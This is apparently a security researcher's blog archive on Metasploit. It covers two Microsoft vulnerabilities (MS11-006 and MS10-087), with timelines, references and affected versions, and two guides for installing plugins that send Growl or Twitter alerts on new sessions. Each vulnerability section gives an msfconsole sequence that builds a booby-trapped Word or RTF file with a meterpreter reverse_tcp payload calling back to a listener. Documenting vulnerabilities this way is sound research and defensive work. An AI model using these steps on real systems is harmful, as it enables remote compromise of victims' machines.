Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

MS11-006 : Windows Thumbnails CreateSizedDIBSECTION Stack Buffer Overflow

Timeline :

Vulnerability disclosed by Moti & Xu Hao on POC2010 the 2010-12-15
CVE registered the 2010-12-22
PoC provided by Metasploit team the 2011-01-04

    PoC provided by :

Moti & Xu Hao
Yaniv Miron aka Lament of ilhack
jduck

    Reference(s) :

CVE-2010-3970
MSA-2490606
MS11-006

    Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2

    Tested on Windows XP SP3

    Description :

Microsoft is one more time victim of a uncoordinated disclosed vulnerability. Moti Joseph & Xu Hao, two security researchers, have reveal, the 15 December, during thePOC2010 conference, a new Microsoft Windows vulnerability. No attention on this vulnerability disclosure until  December 22 (CVE-2010-3970), despite conference schedule of POC2010 had clearly indicate that a new Microsoft Windows vulnerability would be revealed. Maybe this non attention is due that the conference was hold in South Korea ?

Again, shortly thereafter, the information on this vulnerability have circulated quickly in the world of computer security professionals, culminating today in a public PoC provided by the Metasploit team. The presentation, conducted by Moti Joseph & Xu Hao, during the POC2010 conference, is also available on Exploit-DB.
This vulnerability, that we can classified as critical, is fairly simple to exploit. When viewing the content of a directory containing a forged Word, or PowerPoint, document in “Thumbnails” mode, arbitrary code can be executed with the privileges of the local user. Exploitation of this vulnerability can also be done through SharePoint.

A few hours after the release of the Metasploit PoC, Microsoft issued an advisory, MSA-2490606, indicating  the vulnerable systems and providing mitigation solutions. Microsoft does not currently plan to provide an out of band patch to correct this vulnerability.

What is also interesting in the disclosure life cycle of this vulnerability is that the announcement of this conference was held September 13, 2010, and at that time the organizers were looking for people interested to present their work. The deadline for submission of paper (CFP) was announced for October 15, 2010. This would mean that this vulnerability had been known long before October 15, 2010. What is also to note is that Microsoft was a sponsor of this conference.

    Commands :

use exploit/windows/fileformat/ms11_006_crea­tesizeddibsection
set FILENAME msf.doc
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig

Growl Metasploit Plugin on Ubuntu

Growl Metasploit plugin was developed, in ruby, by Carlos Perez, aka Dark Operator. This plugin permit you to send a Growl notification to your Mac OS X when a Metasploit session is created or shutdown. Each notification will contain informations about the related session.

Installation :

To install the Growl Metasploit plugin, you first need to update your Ruby Gem with the following commands (Thanks to Carlos, helping me to update gem).

sudo gem install rubygems-update
cd /var/lib/gems/1.8/bin
sudo ./update_rubygems

Then you will be install the needed Growl Gem needed by the plugin.

sudo gem install ruby-growl

After this, just download the growl.rb script from Github and install the script in the Metasploit plugin directory, by default “/opt/metasploit3/msf3/plugins/“.

Don’t forget to give the right user access to the script and launch Metasploit.

sudo msfconsole

Growl plugin setup :

To setup the Growl plugin settings you first need to install Growl on your Mac OS X, if you don’t have it. Then configure Growl to “Listen for incoming connections” and “Allow remote application registration“, and provide a password in the password field.

Growl configuration
Growl configuration

Don’t forget to restart Growl after the setup. Also Growl is communicating on 9887/UDP, so accept incoming connexions after the following Metasploit Growl plugin “growl_start” command.

In Metasploit load the plugin and configure it by the following commands :

Growl Metasploit plugin configuration
Growl Metasploit plugin configuration

load growl” command allow you to load the Growl Metasploit plugin.

growl_set_host” command allow you to provide the IP address where Growl is running.

growl_set_password” command allow you to provide the Growl password, to authenticate you.

growl_set_sticky” command, “false” or “true“, allow you to make the notification stick until clicked.

grow_set_source” command, allow you to identify the Metasploit instance how will send the notification. For example, if you have two Metasploit instances, you will be available to distinguish the source of the notification.

Just replace all the screenshot configuration settings with your settings 🙂

Then save the configuration with the “growl_save” command :

Growl Metasploit plugin configuration saving
Growl Metasploit plugin configuration saving

As you can see all the configuration settings are save into a “.yaml” file.

If you want to see all the configuration settings from the “.yaml” file just type the “growl_show_parms” command.

Growl Metasploit Plugin configuration display
Growl Metasploit Plugin configuration display

Then to start the growl plugin, run “growl_start” command.

Starting Growl Metasploit Plugin
Starting Growl Metasploit Plugin

Now each time you will have a new Metasploit session, or if a session is shutdown, a Growl notification will be send to the configured Growl IP address. Here under a demonstration video.

MS10-087 : Microsoft Office RTF Parsing Stack Overflow

Timeline :

Vulnerability discovered by wushi of team509
Initial Vendor Notification by iDefense the 2009-08-12
Initial Vendor Reply to iDefense the 2009-08-12
Coordinated Public Disclosure the 2010-11-09

    PoC provided by :

wushi of team509
unknown
jduck

    Reference(s) :

CVE-2010-3333
MS10-087

    Affected version(s) :

Microsoft Office XP Service Pack 3 before KB2289169
Microsoft Office 2003 Service Pack 3 before KB2289187
Microsoft Office 2007 Service Pack 2 before KB2289158
Microsoft Office 2010 (32-bit editions) before KB2289161
Microsoft Office 2010 (64-bit editions) before KB2289161
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac before KB2476512
Microsoft Office for Mac 2011before KB2454823
Open XML File Format Converter for Mac before KB2476511

    Tested on Windows XP SP3 with :

    Office 2003 SP3 msword.exe version 11.0.8328.0 (KB2344911 from 12 October 2010)

    Description :

This module exploits a stack-based buffer overflow in the handling of the ‘pFragments’ shape property within the Microsoft Word RTF parser. All versions of Microsoft Office prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting.

    Commands :

use exploit/windows/fileformat/ms10_087_rtf_­pfragments_bof
set FILENAME test.rtf
set OUTPUTPATH /home/eromang
show targets
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig

Twitt Metasploit Plugin on Ubuntu

Twitt Metasploit plugin was developed, in ruby, by Carlos Perez, aka Dark Operator. This plugin permit you to send a Twitter direct message to a configured account when a Metasploit session is created or shutdown. Each message will contain informations about the related session.

Installation :

To install the Twitt Metasploit plugin on Ubuntu 10.04.1 LTS, you first need to update your Ruby Gem with the following commands (Thanks to Carlos, helping me to update gem).

sudo gem install rubygems-update
cd /var/lib/gems/1.8/bin
sudo ./update_rubygems

Then you will be install the needed Ruby Gem needed by the plugin.

sudo gem install twitter

After this, just download the twitt.rb script from Github and install the script in the Metasploit plugin directory, by default “/opt/metasploit3/msf3/plugins/“. Don’t forget to give the right user access to the script and launch Metasploit.

sudo msfconsole

Twitt plugin setup :

To setup the OAuth 1.0a plugin settings you first need a Twitter account, if you don’t have one. After you need to register the Twitt application in the Twitter Developers.

Don’t forget when you fill the form, to determine that the “Application Type” is “Client” and that the “Client” should have a “Read & Write” “Default Access Type“.

Twitter Developers Application Registration
Twitter Developers Application Registration

After the plugin registration on Twitter, you will need different configuration settings :

  • Consumer key for the Metasploit Twitt plugin “twitt_set_consumer_key” command.
  • Consumer secret for the Metasploit Twitt plugin “twitt_set_consumer_secret” command.
  • Access Token (oauth_token) for the Metasploit Twitt plugin “twitt_set_oauth_token” command.
  • Access Token Secret (oauth_token_secret) for the Metasploit Twitt plugin “twitt_set_oauth_token_secret” command.
  • Your Twitter username account for the Metasploit Twitt plugin “twitt_set_user” command.

In Metasploit load the plugin and configure it by the following commands :

Metasploit Twitt plugin loading
Metasploit Twitt plugin loading
Metasploit Twitt plugin configuration
Metasploit Twitt plugin configuration

Just replace all the screenshot configuration settings with your settings 🙂

Then save the configuration with the “twitt_save” command :

Metasploit Twitt configuration saving
Metasploit Twitt configuration saving

As you can see all the configuration settings are save into a “.yaml” file.

If you want to see all the configuration settings from the “.yaml” file just type the “twitt_show_parms” command.

Metasploit Twitt plugin parameters
Metasploit Twitt plugin parameters

Then to start the twit plugin, run “twitt_start” command.

Metasploit Twitt plugin starting
Metasploit Twitt plugin starting

Now each time you will have a new Metasploit session, or if a session is shutdown, a direct message will be send to the configured twitter account. Here under a demonstration video.